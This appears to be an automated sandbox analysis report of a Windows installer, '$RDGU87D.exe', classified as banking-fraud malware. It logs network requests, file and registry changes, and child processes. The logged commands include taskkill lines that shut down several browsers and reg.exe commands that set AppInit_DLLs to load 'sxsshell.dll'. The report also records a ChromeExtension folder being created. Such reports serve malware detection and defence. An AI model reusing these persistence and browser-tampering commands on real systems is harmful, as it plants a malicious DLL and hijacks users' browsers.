Source: global traffic	HTTP traffic detected: GET /pv/?_a=v&_h=getfiles.wiki&_ss=44fghon7au&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=63lw&_cb=_dtspv.c HTTP/1.1Host: t.dtscout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; oa=1; df=1679401250
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HstCfa4708787=1679430047893; HstCla4708787=1679430047893; HstCmu4708787=1679430047893; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: bgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-84.0.4147.135Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /stats/e.php?4708787&@Ab&@R40431&@w HTTP/1.1Host: s4.histats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1Host: e.dtscout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; oa=1; df=1679401250

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\System32\xcopy.exe	Code function: _time64,srand,GetCommandLineA,strstr,strstr,strstr,strstr,strstr,strstr,strchr,strncpy_s,memset,WideCharToMultiByte,WideCharToMultiByte,GetFileAttributesA,FindResourceA,Sleep,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,rand,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,strstr,strstr,strstr,strstr,CreateFileA,WriteFile,CloseHandle,WinExec,exit, chrome.exe		21_2_000007FEF9021110
Source: C:\Windows\System32\xcopy.exe	Code function: _time64,srand,GetCommandLineA,strstr,strstr,strstr,strstr,strstr,strstr,strchr,strncpy_s,memset,WideCharToMultiByte,WideCharToMultiByte,GetFileAttributesA,FindResourceA,Sleep,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,rand,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,strstr,strstr,strstr,strstr,CreateFileA,WriteFile,CloseHandle,WinExec,exit, chrome.exe		21_2_000007FEF9021110

Source: $RDGU87D.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp

File created: C:\Windows\system32\is-T05I8.tmp

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Code function: 21_2_000007FEF9021110

21_2_000007FEF9021110

Source: $RDGU87D.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: $RDGU87D.tmp.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-T05I8.tmp.4.dr	Static PE information: Resource name: BACKUP type: Zip archive data, at least v2.0 to extract, compression method=store
Source: is-T05I8.tmp.4.dr	Static PE information: Resource name: BACKUP type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: is-T05I8.tmp.4.dr	Static PE information: Resource name: BACKUP type: PE32 executable (console) Intel 80386, for MS Windows

Source: $RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe, 00000001.00000002.923172358.0000000000554000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe, 00000001.00000000.914686878.00000000004C6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe, 00000003.00000002.935328347.00000000006A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe	Binary or memory string: OriginalFileName vs $RDGU87D.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f

Source: C:\Users\user\Desktop\$RDGU87D.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: $RDGU87D.exe	ReversingLabs: Detection: 47%
Source: $RDGU87D.exe	Virustotal: Detection: 60%

Source: C:\Users\user\Desktop\$RDGU87D.exe

File read: C:\Users\user\Desktop\$RDGU87D.exe

Jump to behavior

Source: C:\Users\user\Desktop\$RDGU87D.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\taskkill.exe	Console Write: ................................................d1K.......................".............c.................".............V.......B.........5.....	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Console Write: ................l...............................d1K.......................K.............c.................K.............V.......B.........-.....	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Console Write: ...............................................d1K.......................&.............d.................&............X.......B.........@.....	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Console Write: ................0...............................d1K.......................N.............b.................N.............T.......B.........*.....	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Console Write: ................@...............................d1K.......................C.............b.................C.............T.......B.........&.....	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................0...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.......N.......(...............	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................8...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.&.....N.......(...............	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\$RDGU87D.exe C:\Users\user\Desktop\$RDGU87D.exe
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process created: C:\Users\user\Desktop\$RDGU87D.exe "C:\Users\user\Desktop\$RDGU87D.exe" /SILENT
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM vivaldi.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.php
Source: unknown	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\rY3YrAQjOUXa"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\uOB9DUdVCp9I"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,578352216204275106,4554941784064420504,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1440 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\17vsRA25JVNi"
Source: unknown	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D"
Source: unknown	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8"
Source: unknown	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\Odx9a70VBK1g"
Source: unknown	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\EqwqqQBb6Hr3"
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe "-180126430115798039051631232828-2691859771612897714135344637115556289411055654796"
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process created: C:\Users\user\Desktop\$RDGU87D.exe "C:\Users\user\Desktop\$RDGU87D.exe" /SILENT	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM msedge.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM chrome.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM vivaldi.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM opera.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM brave.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.php	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\uOB9DUdVCp9I"	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,578352216204275106,4554941784064420504,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1440 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\17vsRA25JVNi"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Users\user\Desktop\$RDGU87D.exe

File created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp

Jump to behavior

Source: classification engine

Classification label: mal40.bank.winEXE@62/71@15/12

Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\$RDGU87D.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Code function: 21_2_000007FEF9021110 _time64,srand,GetCommandLineA,strstr,strstr,strstr,strstr,strstr,strstr,strchr,strncpy_s,memset,WideCharToMultiByte,WideCharToMultiByte,GetFileAttributesA,FindResourceA,Sleep,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,rand,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,strstr,strstr,strstr,strstr,CreateFileA,WriteFile,CloseHandle,WinExec,exit,

21_2_000007FEF9021110

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp

File created: C:\Program Files\ChromeExtension

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install

Source: xcopy.exe	String found in binary or memory: Help: %s --help
Source: xcopy.exe	String found in binary or memory: Help: %s --help
Source: $RDGU87D.exe	String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: $RDGU87D.exe

Static file information: File size 1904656 > 1048576

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp

Directory created: C:\Program Files\ChromeExtension

Jump to behavior

Source: $RDGU87D.exe

Static PE information: certificate valid

Source: $RDGU87D.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: archiveint.pdbGCTL source: xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: tar.pdb source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: tar.pdbGCTL source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
